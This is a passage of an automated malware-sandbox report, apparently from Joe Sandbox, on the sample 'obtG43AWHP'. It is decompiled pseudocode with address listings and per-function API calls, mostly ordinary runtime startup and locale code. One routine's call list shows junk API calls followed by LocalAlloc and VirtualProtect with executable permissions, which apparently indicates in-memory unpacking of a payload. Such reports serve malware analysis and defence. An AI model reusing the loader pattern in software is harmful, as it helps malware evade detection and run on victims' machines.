				_t30 = E030045C7(_t29, _t43);
				_t66 = _t30;
				if(_t30 < 0) {
					_push(9);
					E0300420B(_t55, _t66);
				}
				_t31 = E03003FEA(_t56, 0, 1);
				_t67 = _t31;
				if(_t31 != 0) {
					_push(_t31);
					E0300420B(_t55, _t67);
				}
				_t32 = E03004581();
				_t68 =  *(_t59 - 0x3c) & 0x00000001;
				if(( *(_t59 - 0x3c) & 0x00000001) == 0) {
					_t45 = 0xa;
				} else {
					_t45 =  *(_t59 - 0x38) & 0x0000ffff;
				}
				 *((intOrPtr*)(_t59 - 0x20)) = E0300966F(_t68, 0x3000000, 0, _t32, _t45);
				if( *(_t59 - 0x1c) == 0) {
					E030041C1(_t33);
				}
				E030041ED();
				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
				return E03005075( *((intOrPtr*)(_t59 - 0x20)));
			}

















    0x03002d14
    0x03002d16
    0x03002d1b
    0x03002d24
    0x03002d2c
    0x03002d32
    0x03002d39
    0x03002d39
    0x03002d44
    0x03002d4b
    0x03002d52
    0x03002d57
    0x03002d61
    0x00000000
    0x03002d63
    0x03002d68
    0x03002d6f
    0x00000000
    0x03002d71
    0x03002d71
    0x03002d78
    0x00000000
    0x03002d7a
    0x03002d7c
    0x03002d82
    0x03002d82
    0x03002d85
    0x03002d85
    0x03002d78
    0x03002d6f
    0x03002d4d
    0x03002d4d
    0x03002d4d
    0x03002d4d
    0x03002d8f
    0x03002d93
    0x03002d98
    0x03002da0
    0x03002da4
    0x03002da9
    0x03002daa
    0x03002daf
    0x03002db2
    0x03002db7
    0x03002db9
    0x03002dbb
    0x03002dbd
    0x03002dc2
    0x03002dc9
    0x03002dd3
    0x03002dd8
    0x03002ddd
    0x03002ddf
    0x03002de1
    0x03002de3
    0x03002de8
    0x03002de9
    0x03002dee
    0x03002df0
    0x03002df2
    0x03002df4
    0x03002df9
    0x03002dfc
    0x03002e02
    0x03002e04
    0x03002e06
    0x03002e07
    0x03002e0c
    0x03002e0d
    0x03002e12
    0x03002e16
    0x03002e20
    0x03002e18
    0x03002e18
    0x03002e18
    0x03002e2e
    0x03002e34
    0x03002e37
    0x03002e37
    0x03002e3c
    0x03002e71
    0x03002e80

    APIs
    • GetStartupInfoW.KERNEL32(?,03009808,00000058), ref: 03002D24
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 03002D39
      • Part of subcall function 03005004: HeapCreate.KERNEL32(00000000,00001000,00000000,03002D8D), ref: 0300500D
      • Part of subcall function 03004E89: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
      • Part of subcall function 03004E89: TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
      • Part of subcall function 03004E89: TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004E89: GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
    • __RTC_Initialize.LIBCMT ref: 03002DAA
      • Part of subcall function 030048FF: GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 030048FF: GetFileType.KERNEL32(?), ref: 03004A3F
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
      • Part of subcall function 030048FF: GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
      • Part of subcall function 030048FF: GetFileType.KERNEL32(00000000), ref: 03004ADB
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
      • Part of subcall function 030048FF: SetHandleCount.KERNEL32 ref: 03004B32
    • __amsg_exit.LIBCMT ref: 03002DBD
    • GetCommandLineW.KERNEL32 ref: 03002DC3
      • Part of subcall function 030048A7: GetEnvironmentStringsW.KERNEL32(00000000,03002DD3), ref: 030048AA
      • Part of subcall function 030048A7: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 030048E6
      • Part of subcall function 030047F9: GetModuleFileNameW.KERNEL32(00000000,0300C430,00000104), ref: 03004819
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004843
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004885
    • __amsg_exit.LIBCMT ref: 03002DE3
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 030045E7
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 0300461F
    • __amsg_exit.LIBCMT ref: 03002DF4
      • Part of subcall function 03003FEA: __initterm_e.LIBCMT ref: 03004020
    • __amsg_exit.LIBCMT ref: 03002E07
      • Part of subcall function 0300966F: _strlen.LIBCMT ref: 0300967E
      • Part of subcall function 0300966F: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
      • Part of subcall function 0300966F: ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
      • Part of subcall function 0300966F: ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
      • Part of subcall function 0300966F: GetColorSpace.GDI32(00000000), ref: 030096DF
      • Part of subcall function 0300966F: GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
      • Part of subcall function 0300966F: ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
      • Part of subcall function 0300966F: SetICMMode.GDI32(00000000,00000000), ref: 030096FB
      • Part of subcall function 0300966F: GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
      • Part of subcall function 0300966F: GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
      • Part of subcall function 0300966F: GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
      • Part of subcall function 0300966F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
      • Part of subcall function 0300966F: LocalAlloc.KERNEL32(00000000,000583E9), ref: 03009778
      • Part of subcall function 0300966F: VirtualProtect.KERNEL32(00000000,000583E9,00000040,?), ref: 030097D9
      • Part of subcall function 0300966F: GetTickCount.KERNEL32 ref: 030097E4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0300818A, Relevance: 12.2, APIs: 8, Instructions: 190
    C-Code - Quality: 79%
    			E0300818A(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				int _t73;
				short* _t75;
				short* _t77;
				short* _t78;
				signed int _t81;
				void* _t83;
				int _t84;
				int _t86;
				signed int _t88;
				void* _t90;
				short* _t91;
				char* _t96;
				int _t99;
				signed int _t108;
				signed int _t109;
				int _t112;
				signed int _t113;
				signed int _t115;
				int _t116;

				_t67 =  *0x300bbe4; // 0xbb40e64e
				_v8 = _t67 ^ _t115;
				_t109 = _a20;
				if(_t109 <= 0) {
					L8:
					_v12 = 0;
					if(_a32 == 0) {
						_a32 =  *((intOrPtr*)( *_a4 + 4));
					}
					_t114 = MultiByteToWideChar;
					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
					_v20 = _t112;
					if(_t112 != 0) {
						if(__eflags <= 0) {
							L21:
							_v16 = 0;
							L22:
							__eflags = _v16;
							if(_v16 == 0) {
								goto L11;
							}
							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
							__eflags = _t75;
							if(_t75 == 0) {
								L45:
								E0300816A(_v16);
								_t73 = _v12;
								goto L46;
							}
							_t114 = LCMapStringW;
							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
							_v12 = _t77;
							__eflags = _t77;
							if(_t77 == 0) {
								goto L45;
							}
							__eflags = _a12 & 0x00000400;
							if((_a12 & 0x00000400) == 0) {
								_t113 = _v12;
								__eflags = _t113;
								if(_t113 <= 0) {
									L37:
									_t112 = 0;
									__eflags = 0;
									L38:
									__eflags = _t112;
									if(_t112 != 0) {
										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
										__eflags = _t78;
										if(_t78 != 0) {
											_push(0);
											_push(0);
											__eflags = _a28;
											if(_a28 != 0) {
												_push(_a28);
												_push(_a24);
											} else {
												_push(0);
												_push(0);
											}
											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
										}
										E0300816A(_t112);
									}
									goto L45;
								}
								_t81 = 0xffffffe0;
								_t109 = _t81 % _t113;
								__eflags = _t81 / _t113 - 2;
								if(_t81 / _t113 < 2) {
									goto L37;
								}
								_t83 = _t113 + _t113 + 8;
								__eflags = _t83 - 0x400;
								if(_t83 > 0x400) {
									_t84 = E030089C5(_t109, _t113, LCMapStringW, _t83);
									__eflags = _t84;
									if(_t84 != 0) {
										 *_t84 = 0xdddd;
										_t84 = _t84 + 8;
										__eflags = _t84;
									}
									_t112 = _t84;
									goto L38;
								}
								E03009200(_t83);
								_t112 = _t116;
								__eflags = _t112;
								if(_t112 == 0) {
